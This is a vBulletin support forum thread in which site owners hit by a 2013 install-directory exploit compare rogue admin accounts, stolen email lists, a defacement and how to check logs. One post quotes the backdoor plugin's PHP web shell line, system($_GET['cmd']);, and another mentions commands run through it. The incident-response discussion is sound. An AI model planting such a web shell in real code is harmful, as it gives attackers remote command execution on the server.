vBulletin 4.2.5 is end of life and will not be receiving any future development. Warning: vBulletin 4.2.5 is not compatible with PHP 7.2.0 or higher.
Welcome to the vBulletin support forums! In our community forums you can receive professional support and assistance with any issues you might have with your vBulletin Products.
If you are having problems posting in the relevant areas for your software, please see this topic.
Upgrade to vBulletin 5
We're pleased to announce a special promotion for upgrading your vBulletin 3/4 sites to vBulletin 5. From now until December 31st, we are offering vBulletin 5 license upgrades at $169 each. This promotion is available to all vBulletin 3 (owned) and vBulletin 4 license holders, entitling you to the latest version of vBulletin 5.
If you would like to purchase this upgrade, please log into the vBulletin Members Area and use Promo Code: vB5UPGRADE during checkout to apply the discount.
Received the email notice this morning, logged into my forum, just HAPPENED by shear luck to see a new registered member "Th3H4ck" and scene they had administrative powers. So I immediately deleted their account, and removed the /install directory on my forum as indicated. The site is not defaced and otherwise appears to be OK.
HOWEVER, I am reading about other members having admin log entries changed and such, how can I verify nothing was changed in the database or put elsewhere? I ran the admincp log and didn't see anything out of normal running back the past several days.
You can see what they were doing by looking in your Statistics & Logs > Control Panel Logs.
Please don't PM or VM me for support - I only help out in the threads. vBulletin Manual & vBulletin 4.0 Code Documentation (API)
Want help modifying your vbulletin forum? Head on over to vbulletin.org
If I post CSS and you don't know where it goes, throw it into the additional.css template. W3Schools <- awesome site for html/css help
I had the same things and did the same steps (removing /install and deleting the three new administrator accounts). Interested to know from the greater community whether anyone has found that anything else was done with these user accounts.
Several of my forums were affected by this exploit, however only one of the forums had activity from the hacked user which was them grabbing the email list.
44237 support 22:27, 3rd Sep 2013 email.php makelist 99.227.104.35
44236 support 22:27, 3rd Sep 2013 email.php genlist 99.227.104.35
Right, I checked there and have'nt seen anything, but how deep does this go, were they able to access the database directly, cpanel, etc. etc?
They would need to create a plugin or something to have additional access outside the AdminCP. However once in the AdminCP, that could be possible. You would need to check your plugins to make sure none of them are new or not what you installed.
Translations provided by Google. Wayne Luke The Rabid Badger - a vBulletin Cloud demonstration site.
vBulletin 5 API - Full / Mobile
Vote for your favorite feature requests and the bugs you want to see fixed.
I was hacked this morning...not sure if it was this exploit or not, but I had an admin user that created a default plugin that was an ajax start that did the following:
system($_GET['cmd']);
I've deleted the user...
He replaced my index.php with some text that said "HACKED...Fix yo s**t" only it wasn't censored...From what I can tell, that's the only damage that was done. Is this the kind of activity you would expect from this exploit? Should I submit a ticket to get someone to look into further damages and issues? It looks like the individual was sending a warning or something for us to tighten up on security or something.
I mainly want to make sure I got rid of all the back doors he may have put in. The plugin that had the system command in it existed twice.
There's some other stuff that he did, but I'm not sure how to get the details and what I shoudl look for...here's my admin log:
They would need to create a plugin or something to have additional access outside the AdminCP. However once in the AdminCP, that could be possible. You would need to check your plugins to make sure none of them are new or not what you installed.
My administrative log did not indicate there were any plugins modified/uploaded, and pruning it is locked via the config file. Am I safe to assume nothing else happened then?
Suffering the same sort of hack. A plugin was added to our vB (ajax_complete), which through ajap.php, provided the hacker access to system commands. I've checked the access_log and nothing happened after a "uname -a". Except that another ip address (both ip addresses belong to Leaseweb Netherlands) has accessed the same ajax.php with the same uname command. No other commands have been run though ajax.php. The error_log shows they were trying to mess with the database though trough vb_database_alter, amongst other things.
vB has been cleaned up, ip addresses have been added to the firewall (for what is worth).
Still, check your access and error logs if you suffered the same. Whatever's been done might go further then the vB control panel logs will show.
widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
Working...
X
We process personal data about users of our site, through the use of cookies and other technologies, to deliver our services, personalize advertising, and to analyze site activity. We may share certain information about our users with our advertising and analytics partners. For additional details, refer to our Privacy Policy.
By clicking "I AGREE" below, you agree to our Privacy Policy and our personal data processing and cookie practices as described therein. You also consent to the transfer of your data to our servers in the United States, where data protection laws may be different from those in your country.
Comment